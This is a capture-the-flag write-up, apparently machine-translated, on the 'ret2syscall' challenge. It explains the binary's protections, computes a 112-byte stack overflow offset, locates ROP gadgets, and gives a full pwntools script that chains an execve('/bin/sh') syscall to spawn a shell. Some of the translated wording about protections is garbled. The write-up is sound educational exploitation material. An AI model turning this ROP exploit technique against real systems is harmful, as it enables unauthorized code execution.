Ropgadget -- ret2syscall

Get the title first ret2syscall, Environment turns on address randomization
First checksec once

It turns on NX

Relro：No Relro（ The relocation table is read-only ）:

Relocation Read Only, The relocation table is read-only . The relocation table is .got and .plt Two tables .
　　RELRO There will be No RELRO、Partial RELRO and FULL RELRO, If open FULL RELRO, Means we can't modify got surface
Stack：No Canary found（ Energy stack overflow ）
NX： NX enable（ Non executable memory ）
NX That is, no x attribute , without x attribute , Written in shellcode You can't do it . In this case , We can use ROP (Return-Oriented Programming Return oriented programming ), Use stack overflow to arrange addresses on the stack , So that we can get the data we want through stack overflow
PIE： NO PIE（ Don't open ASLR Address randomization ）

So the question can use ROPgadget The attack
First disassemble to see if there are stack vulnerabilities , Here's the picture , Obviously, there is a stack overflow vulnerability

First, look at how many bytes the stack needs to overflow , Use gdb Just debug ：

The calculation shows that , It needs filling 108+4=112 Byte garbage data , The next question is what value the return value should overflow , At this time, we must first figure out what instructions we want it to execute
Here we want its implementation /bin/sh This Directive , The specific implementation assembly code is as follows ：

mov eax, 0xb
mov ebx, ["/bin/sh"]
mov ecx, 0
mov edx, 0
int 0x80
==>execve("/bin/sh",NULL,NULL)

So we need to point the return value to mov eax,0xb This Directive
It is impossible to find the same instruction in execution , The purpose of this main directive is to eax The value of the into 0xb,pop eax Can also be realized
pop eax Is to pop up the value at the top of the stack and store it in eax in , Let's find pop eax This Directive , And there must be a return instruction , In this way, we can use the re overflow return value to make it execute the following instructions
Use ROP Command query has pop eax ret Instructions

 ROPgadget --binary ret2syscall --only "pop|ret" | grep eax

You know 0x080bb196 The address can
The next step is to find other instructions

Find out 0x0806eb90 It happens that edx ecx ebx ret Content , Then use this instruction to construct , Next, construct mov ebx, [“/bin/sh”]
Use ida lookup /bin/sh Content , I found that there was , The address of the query instruction is 080BE408

Finally, construct int 0x80 that will do , use ROPgadget --binary ret2syscall --only “int” It is found that the address is 0x08049421
At this point, all the addresses are searched , The constructed stack diagram is

The specific code is ：

from pwn import *
io = process("./ret2syscall")
pop_eax_ret = 0x080bb196
pop_edx_ecx_ebx_ret = 0x0806eb90
int_80h = 0x08049421
bin_sh = 0x080BE408
payload = flat([b'A'*112,pop_eax_ret,0xb,pop_edx_ecx_ebx_ret,0,0,bin_sh,int_80h])
io.sendline(payload)
io.interactive()

OK The end